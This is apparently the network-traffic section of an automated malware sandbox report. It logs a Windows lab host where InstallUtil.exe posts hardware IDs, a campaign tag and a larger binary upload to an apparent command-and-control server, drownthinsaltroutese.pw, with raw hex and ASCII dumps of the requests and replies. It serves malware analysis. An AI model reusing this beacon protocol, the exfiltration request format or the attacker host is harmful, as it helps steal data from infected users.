                                                                                                                                                                    2024-01-07 04:29:50 UTC1369INData Raw: 65 2f 52 35 59 37 4b 55 69 46 46 6a 71 2b 65 7a 68 55 31 6f 7a 46 4e 68 5a 6f 79 64 51 6a 46 39 59 78 70 4b 49 61 58 38 63 47 6d 69 5a 61 6b 77 6f 49 52 5a 41 6e 4a 37 35 37 4b 57 6d 48 71 64 77 58 4c 38 31 6b 36 53 34 75 77 78 53 42 68 79 4e 6a 2b 32 65 37 66 30 65 66 67 67 78 52 31 48 49 79 41 38 59 41 58 4c 36 4d 7a 42 35 72 53 58 68 42 4c 69 37 44 46 49 47 47 54 39 35 47 44 37 4d 58 52 35 59 37 4b 55 69 4d 41 77 4b 2f 42 67 42 56 75 35 58 46 45 68 5a 51 6a 65 42 76 4e 38 59 46 73 4b 6f 57 53 39 73 43 67 6a 5a 71 67 79 34 55 57 62 41 54 44 37 70 33 4d 56 43 32 76 48 69 33 48 33 6e 4d 36 53 34 75 77 78 53 49 6b 6b 74 69 68 67 2b 36 6f 6b 4c 48 47 79 48 38 4c 52 59 36 74 32 34 41 58 63 71 38 65 4c 63 66 65 63 7a 70 4c 69 2b 76 6f 43 6d 48 49 32 72 75 44
                                                                                                                                                                    Data Ascii: e/R5Y7KUiFFjq+ezhU1ozFNhZoydQjF9YxpKIaX8cGmiZakwoIRZAnJ757KWmHqdwXL81k6S4uwxSBhyNj+2e7f0efggxR1HIyA8YAXL6MzB5rSXhBLi7DFIGGT95GD7MXR5Y7KUiMAwK/BgBVu5XFEhZQjeBvN8YFsKoWS9sCgjZqgy4UWbATD7p3MVC2vHi3H3nM6S4uwxSIkktihg+6okLHGyH8LRY6t24AXcq8eLcfeczpLi+voCmHI2ruD
                                                                                                                                                                    2024-01-07 04:29:50 UTC1369INData Raw: 69 6b 79 6c 49 68 52 59 36 74 67 4b 30 39 4c 36 4d 7a 42 38 66 65 63 7a 70 4a 7a 76 37 48 4f 6d 48 4b 6c 50 72 4e 70 6f 69 56 72 73 43 43 47 57 67 4c 78 2b 75 56 79 31 42 72 34 48 52 41 68 4a 67 39 63 67 2f 4b 38 59 68 74 4c 49 4c 59 74 36 37 47 78 64 48 6c 6a 73 70 53 49 55 57 4d 36 49 47 43 44 53 2b 68 56 46 4b 4f 6b 6a 63 34 5a 71 47 77 78 53 42 68 79 4e 72 6d 6a 38 48 76 30 65 57 4f 79 6c 49 68 48 71 4f 48 32 34 41 58 4c 36 4d 7a 42 38 66 63 4e 6e 52 4a 6b 62 44 48 62 69 71 4d 6e 76 7a 4e 72 34 47 62 6f 73 53 4d 45 57 55 42 7a 2b 43 64 78 31 52 69 35 58 31 4c 6a 35 30 77 64 41 4c 47 2b 59 49 69 62 65 58 77 75 34 50 73 78 64 48 6c 6a 73 70 51 5a 42 2b 4d 74 39 75 43 5a 47 37 33 5a 6c 57 4a 33 46 34 51 53 34 75 77 78 53 42 68 6c 64 61 57 71 65 7a 46 30
                                                                                                                                                                    Data Ascii: ikylIhRY6tgK09L6MzB8feczpJzv7HOmHKlPrNpoiVrsCCGWgLx+uVy1Br4HRAhJg9cg/K8YhtLILYt67GxdHljspSIUWM6IGCDS+hVFKOkjc4ZqGwxSBhyNrmj8Hv0eWOylIhHqOH24AXL6MzB8fcNnRJkbDHbiqMnvzNr4GbosSMEWUBz+Cdx1Ri5X1Lj50wdALG+YIibeXwu4PsxdHljspQZB+Mt9uCZG73ZlWJ3F4QS4uwxSBhldaWqezF0
                                                                                                                                                                    2024-01-07 04:29:50 UTC1369INData Raw: 53 49 55 57 4f 72 64 75 43 55 6d 47 68 4b 51 66 46 6e 7a 74 31 42 39 76 32 67 57 6b 67 68 4a 44 38 79 61 71 4e 6e 71 6a 48 67 68 6c 72 42 38 50 71 6b 63 6c 54 59 2b 42 33 53 59 6a 63 66 78 64 68 69 37 44 46 49 47 48 49 32 72 75 42 71 5a 2f 54 2f 34 37 49 4e 33 6b 4b 79 76 69 49 39 31 4a 74 73 44 45 71 37 64 35 7a 4f 6b 75 4c 73 4a 67 73 53 4f 58 77 6b 6f 50 73 6e 76 7a 50 6a 73 70 53 49 55 57 4f 72 64 75 43 55 6d 47 68 4b 51 66 46 6d 44 74 34 42 4d 50 35 69 47 45 6b 68 4a 6a 30 79 37 79 50 6b 36 66 43 6a 68 46 76 41 73 33 6a 6d 74 42 5a 61 2b 78 33 54 5a 66 63 66 78 64 68 69 37 44 46 49 47 48 49 32 72 75 42 71 5a 2f 54 2f 34 37 49 4d 47 67 4c 7a 2b 4f 59 78 57 42 75 37 33 39 43 6b 39 78 65 45 45 75 4c 73 4d 55 67 59 5a 58 57 6b 71 37 47 37 4e 48 6c 31 65
                                                                                                                                                                    Data Ascii: SIUWOrduCUmGhKQfFnzt1B9v2gWkghJD8yaqNnqjHghlrB8PqkclTY+B3SYjcfxdhi7DFIGHI2ruBqZ/T/47IN3kKyviI91JtsDEq7d5zOkuLsJgsSOXwkoPsnvzPjspSIUWOrduCUmGhKQfFmDt4BMP5iGEkhJj0y7yPk6fCjhFvAs3jmtBZa+x3TZfcfxdhi7DFIGHI2ruBqZ/T/47IMGgLz+OYxWBu739Ck9xeEEuLsMUgYZXWkq7G7NHl1e
                                                                                                                                                                    2024-01-07 04:29:50 UTC1369INData Raw: 6a 71 2b 6f 7a 31 74 6a 35 6d 63 46 36 76 52 7a 4f 6b 75 4c 73 4d 56 39 62 65 58 77 75 34 50 73 78 64 48 6c 31 65 64 34 49 55 57 4f 72 64 75 41 46 79 2b 68 64 6b 6e 46 78 48 4d 34 43 4d 58 39 68 47 30 67 69 5a 6e 7a 30 37 79 4c 6d 71 2f 4a 68 42 74 74 41 64 37 70 6c 73 74 57 62 75 68 32 54 59 6d 57 4d 6e 39 4a 68 35 33 76 49 47 48 49 32 72 75 44 37 4d 58 54 6f 4e 54 49 53 43 46 48 37 2f 69 4a 7a 78 55 43 69 54 4d 48 78 39 35 7a 4f 68 61 48 6e 65 38 67 59 63 6a 61 75 34 4f 33 36 50 76 6c 6a 73 70 53 49 55 57 4f 72 64 6e 46 57 53 32 35 4d 77 57 4e 6b 54 6c 79 44 63 37 2f 67 47 51 71 6d 4a 48 38 7a 36 36 44 6d 4b 6a 4b 6a 42 4e 6a 46 63 72 72 6b 63 46 59 59 4f 39 79 51 63 58 53 58 68 42 4c 69 37 44 46 49 47 48 49 32 72 6e 47 74 73 66 4c 35 59 79 36 48 57 30
                                                                                                                                                                    Data Ascii: jq+oz1tj5mcF6vRzOkuLsMV9beXwu4PsxdHl1ed4IUWOrduAFy+hdknFxHM4CMX9hG0giZnz07yLmq/JhBttAd7plstWbuh2TYmWMn9Jh53vIGHI2ruD7MXToNTISCFH7/iJzxUCiTMHx95zOhaHne8gYcjau4O36PvljspSIUWOrdnFWS25MwWNkTlyDc7/gGQqmJH8z66DmKjKjBNjFcrrkcFYYO9yQcXSXhBLi7DFIGHI2rnGtsfL5Yy6HW0
                                                                                                                                                                    2024-01-07 04:29:50 UTC1369INData Raw: 34 41 58 4c 36 4d 7a 42 38 57 62 4b 54 68 52 69 37 4b 72 59 54 4b 41 32 74 37 62 75 49 43 66 74 73 65 46 48 43 4e 6f 70 4b 33 62 67 42 63 76 6f 32 34 4c 36 76 52 7a 4f 6b 75 4c 73 4d 56 37 54 4f 4c 61 75 34 50 73 78 64 48 6c 6a 73 67 58 62 30 65 55 72 64 6e 43 56 47 44 7a 64 45 53 50 6c 6a 78 77 42 73 7a 33 69 47 59 6e 67 5a 62 72 7a 36 47 48 6c 61 7a 4e 6a 52 4e 6f 44 63 4c 6d 69 34 49 62 41 6f 6b 7a 42 38 66 65 63 7a 70 4c 69 37 4b 41 65 6d 50 53 32 72 6e 72 74 59 61 65 71 34 36 6d 47 33 55 41 6a 73 36 58 79 56 4a 68 39 7a 45 71 37 64 35 7a 4f 6b 75 4c 73 4a 67 73 54 4f 4c 61 75 34 50 73 78 64 47 2b 6f 2b 42 53 49 55 57 4f 72 64 75 41 46 79 33 6d 66 51 58 64 33 6e 46 78 42 38 58 78 67 47 6f 72 6a 35 6a 79 77 61 47 4e 6e 61 44 65 67 68 78 70 46 63 50 73
                                                                                                                                                                    Data Ascii: 4AXL6MzB8WbKThRi7KrYTKA2t7buICftseFHCNopK3bgBcvo24L6vRzOkuLsMV7TOLau4PsxdHljsgXb0eUrdnCVGDzdESPljxwBsz3iGYngZbrz6GHlazNjRNoDcLmi4IbAokzB8feczpLi7KAemPS2rnrtYaeq46mG3UAjs6XyVJh9zEq7d5zOkuLsJgsTOLau4PsxdG+o+BSIUWOrduAFy3mfQXd3nFxB8XxgGorj5jywaGNnaDeghxpFcPs
                                                                                                                                                                    2024-01-07 04:29:50 UTC1369INData Raw: 33 71 66 30 43 45 6b 44 74 2f 42 39 76 7a 6a 57 34 69 6a 5a 2f 79 30 36 57 56 6d 4b 2f 50 68 68 68 71 42 38 4c 76 6d 4d 39 56 4c 61 38 65 4c 63 66 65 63 7a 70 4c 69 37 44 46 49 69 53 53 32 4b 47 44 37 71 4b 77 73 4e 71 43 55 6b 41 51 32 75 57 65 7a 6b 4e 6d 34 48 4a 54 69 49 78 78 46 32 47 4c 73 4d 55 67 59 63 69 48 74 36 37 47 78 64 48 6c 6a 73 70 53 65 6d 69 6b 72 64 75 41 46 79 2b 6a 4d 77 66 46 6d 7a 30 34 55 59 75 79 6a 47 30 74 68 35 50 39 79 4b 75 50 6b 4b 4c 4a 67 68 78 76 42 73 54 6d 6b 38 64 51 61 2b 74 79 53 34 71 64 50 58 77 41 78 2f 76 48 4c 45 7a 69 32 72 75 44 37 4d 58 52 35 59 37 49 46 33 74 48 6c 4b 33 5a 39 45 56 71 2b 58 78 56 78 36 34 79 61 52 6a 63 2f 35 64 6b 59 61 57 62 39 63 4b 72 67 49 50 6e 6f 2b 42 53 49 55 57 4f 72 64 76 64 47
                                                                                                                                                                    Data Ascii: 3qf0CEkDt/B9vzjW4ijZ/y06WVmK/PhhhqB8LvmM9VLa8eLcfeczpLi7DFIiSS2KGD7qKwsNqCUkAQ2uWezkNm4HJTiIxxF2GLsMUgYciHt67GxdHljspSemikrduAFy+jMwfFmz04UYuyjG0th5P9yKuPkKLJghxvBsTmk8dQa+tyS4qdPXwAx/vHLEzi2ruD7MXR5Y7IF3tHlK3Z9EVq+XxVx64yaRjc/5dkYaWb9cKrgIPno+BSIUWOrdvdG
                                                                                                                                                                    2024-01-07 04:29:50 UTC1369INData Raw: 58 67 35 38 6e 65 30 37 33 7a 4b 6c 6c 4a 59 2b 66 36 59 4f 41 6a 49 65 67 6a 4d 5a 2f 43 30 57 4f 72 64 75 41 46 79 2b 6a 4d 55 72 46 78 48 4e 42 53 59 47 79 75 43 78 4d 34 74 71 37 67 2b 7a 46 30 65 57 4f 79 41 67 6a 58 34 36 76 72 4d 46 62 59 2b 5a 6e 56 4d 69 79 4e 6e 34 4d 7a 75 4c 46 54 43 69 65 6e 37 6d 50 77 65 2f 52 35 59 37 4b 55 69 46 46 6a 71 2b 66 67 67 30 76 73 54 38 71 37 64 35 7a 4f 6b 75 4c 73 4d 55 67 59 34 36 4a 75 5a 6e 73 31 38 48 38 6d 64 74 48 4d 31 57 6a 68 39 75 41 46 79 2b 6a 4d 31 72 4c 38 31 6b 36 53 34 75 77 78 53 41 36 35 66 43 37 67 2b 7a 46 30 65 57 4f 79 6c 42 31 52 35 53 74 79 34 77 36 42 61 4d 7a 42 38 66 65 63 7a 70 4c 69 65 44 48 4f 6d 48 4b 33 2f 72 54 76 49 47 51 73 63 2f 50 4c 6c 30 45 32 75 4b 57 79 56 52 54 33 31
                                                                                                                                                                    Data Ascii: Xg58ne073zKllJY+f6YOAjIegjMZ/C0WOrduAFy+jMUrFxHNBSYGyuCxM4tq7g+zF0eWOyAgjX46vrMFbY+ZnVMiyNn4MzuLFTCien7mPwe/R5Y7KUiFFjq+fgg0vsT8q7d5zOkuLsMUgY46JuZns18H8mdtHM1Wjh9uAFy+jM1rL81k6S4uwxSA65fC7g+zF0eWOylB1R5Sty4w6BaMzB8feczpLieDHOmHK3/rTvIGQsc/PLl0E2uKWyVRT31


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.449741172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:29:50 UTC287OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 629
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:29:50 UTC629OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:29:51 UTC1343INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:51 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=ca5vcla3kbcnr7nhf2et4m5spa; expires=Wed, 01-May-2024 22:16:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:29:51 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:29:51 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:29:51 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SckV0%2F%2BmrBpiDJO%2BRwM%2B3pLQ3t0tYNEHDhBC%2BDJ6pHRDli3aIm9ezPFPvDwUZX01DdCiCnRke3krzL%2BO6XlWczFfrwC7l%2BXR0sLZ8zZoJLWccloZNcRuPqyaPW%2BpczAXwTSls8mIGMt2ew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 841976496b0843ca-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:29:51 UTC26INData Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64
                                                                                                                                                                    Data Ascii: 16Debug data is disabled
                                                                                                                                                                    2024-01-07 04:29:51 UTC7INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.449744172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:29:51 UTC289OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 19499
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:29:51 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:29:51 UTC4168OUTData Raw: 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f
                                                                                                                                                                    Data Ascii: 2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?
                                                                                                                                                                    2024-01-07 04:29:51 UTC1331INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:51 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=63jte9elsn0gv5dug12rasnu9n; expires=Wed, 01-May-2024 22:16:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:29:51 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:29:51 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:29:51 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PfPeJf4rFG8waZjkQ7hzzTjpq0Kni7XE6zufsrjZ8qukJJbuJ%2FQp1LjVJ1zIUufLlhWuViUKidhfnNjhXTkf9vfLBisGMCWvtyraW9IiGMiFVzg36jT1DbSiAGBnvBR8P%2BzGOMmLHZSEIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8419764cdd7c7285-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:29:51 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 31 37 36 0d 0a
                                                                                                                                                                    Data Ascii: 11ok 191.96.227.176
                                                                                                                                                                    2024-01-07 04:29:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.449746172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:29:52 UTC287OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 629
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:29:52 UTC629OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:29:52 UTC1333INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:52 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=lhqt6u0l2464mbpbv2rkmohn4m; expires=Wed, 01-May-2024 22:16:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:29:52 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:29:52 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:29:52 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=688xKHZQowZOlWZ4rKAcJukIl5446Di02frl0O%2Fhy0ix%2B1q2npL3O3xFjOk2FyJskaQXZhSsp5kyDLLmPmv0TwgvFtVMOo6k74wQDaCttQ2GvUS%2BcX0rpM1GESbNcOCkRlxaAIMpBukU2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 84197651a9d142af-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:29:52 UTC28INData Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a
                                                                                                                                                                    Data Ascii: 16Debug data is disabled
                                                                                                                                                                    2024-01-07 04:29:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    5192.168.2.449748172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:29:52 UTC287OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 629
                                                                                                                                                                    Host: drownthinsaltroutese.pw
